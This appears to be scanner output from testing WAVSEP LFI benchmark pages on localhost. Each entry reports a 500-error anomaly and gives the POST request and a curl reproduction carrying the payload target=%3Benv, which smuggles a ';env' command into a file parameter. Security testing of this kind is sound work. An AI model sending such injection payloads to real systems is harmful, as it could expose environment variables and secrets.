curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
